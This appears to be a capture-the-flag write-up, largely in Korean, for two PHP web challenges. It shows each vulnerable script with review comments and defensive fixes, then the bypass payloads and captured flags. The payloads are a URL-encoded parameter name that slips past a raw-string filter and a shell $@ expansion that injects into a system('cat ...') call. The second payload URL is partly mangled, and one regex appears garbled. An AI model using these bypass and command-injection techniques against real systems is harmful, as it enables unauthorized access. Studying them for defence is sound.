<?php
# Challenge script: a string-matching "WAF" in front of a tiny query-parameter router.
# Note that the script prints its own source (highlight_file below) when no route matches.
error_reporting(0); // turn off PHP error reporting for this request
require __DIR__."/secret.php"; // flag is here ($flag is not defined in this file; presumably set by secret.php)
# waf
# The filter inspects the query component of the raw request target.
# $_SERVER['REQUEST_URI'] is not percent-decoded, whereas the keys of $_GET
# (used by the router below) are decoded by PHP. The check and the router
# therefore look at two different representations of the same input, so a
# denylist match here does not guarantee what $_GET will contain.
# Defensive fix: make the decision on the same parsed value the router uses
# (e.g. the keys of $_GET), or better, gate the sensitive route with real
# authorization instead of a substring denylist.
# NOTE(review): parse_url() returns null when there is no query and false on a
# URI it cannot parse; neither case is handled, so this check fails open.
$url_query = parse_url($_SERVER['REQUEST_URI'], PHP_URL_QUERY);
// Case-insensitive substring search for "flag" in the still-encoded query string.
if(stripos($url_query, 'flag') !== false){
die('no hack');
}
# routes
# Dispatch on the presence of a decoded parameter name; values are ignored.
if(isset($_GET['author'])){
die('safflower');
}else if(isset($_GET['flag'])){
// Sensitive route: protected only by the raw-string filter above.
die($flag);
}else{
// Default route: show this file's source and stop.
highlight_file(__FILE__);
die;
}
$_SERVER['REQUEST_URI'] 는 URL 디코딩이 되지 않은 원본 값이라 필터는 인코딩된 문자열 그대로를 검사하지만, $_GET 의 키는 PHP가 디코딩해 주기 때문에 flag를 URL encoding 하여 보내면 풀린다.
PAY = http://dm1536803965686.fun25.co.kr:23902/5099d288498b4e17/?%66%6c%61%67
FLAG : LAYER7{4f3a6c9f4b9c36ed3c39b8d3e14aa4fb}
<?php
# Challenge script: prints a file chosen by the "file" query parameter by
# shelling out to cat, guarded only by a regex denylist.
require __DIR__.'/flag.php';
if(isset($_GET['file'])){
# Denylist applied to the raw parameter value (case-insensitive).
# NOTE(review): as printed, the backslashes in this pattern look doubled by the
# page's extraction (the literal would end at the first \\' and would not parse).
# The intended alternatives appear to be: flag, single quote, double quote,
# backtick, backslash, ;, (, ), *, question mark, "..", and / -- confirm against
# the original challenge source.
# "$" is not on the list.
if(preg_match('/flag|\\'|\\"|`|\\\\\\\\|;|\\(|\\)|\\*|\\?|\\.\\.|\\//i', $_GET['file'])){
die('no hack');
}
# User input is concatenated into a shell command line. Inside double quotes
# the shell still performs $-expansion, so the name that cat finally receives
# can differ from the string the regex inspected; the filter and the shell do
# not agree on what the input "is".
# Defensive fix: do not involve a shell at all -- map the parameter onto an
# allowlist of known file names (or resolve it inside a fixed directory and
# verify the resolved path) and read it with readfile(); if a shell command is
# unavoidable, pass the value through escapeshellarg().
system('cat "'.$_GET['file'].'"');
}else{
// No parameter given: redirect to a default file.
header('Location: ?file=test.txt');
}
// Always append a separator and this script's own highlighted source.
echo '<hr>';
highlight_file(__FILE__);
셸은 큰따옴표 안에서도 $@ 를 확장하며, 위치 인자가 없으면 빈 문자열이 되므로 fl$@ag == flag 가 된다. 필터에는 $ 가 없어 이 방법으로 bypass 할 수 있다.
PAY = http://dm1536803965686.fun25.co.kr:23903/74cdf2ead84d1743/[email protected] (payload 부분이 사이트의 이메일 보호 기능에 의해 "[email protected]" 로 치환되어 원문이 보이지 않음 — 위에서 설명한 fl$@ag 형태로 추정)
FLAG : LAYER7{070e260558a03c1494817459ebbc060e}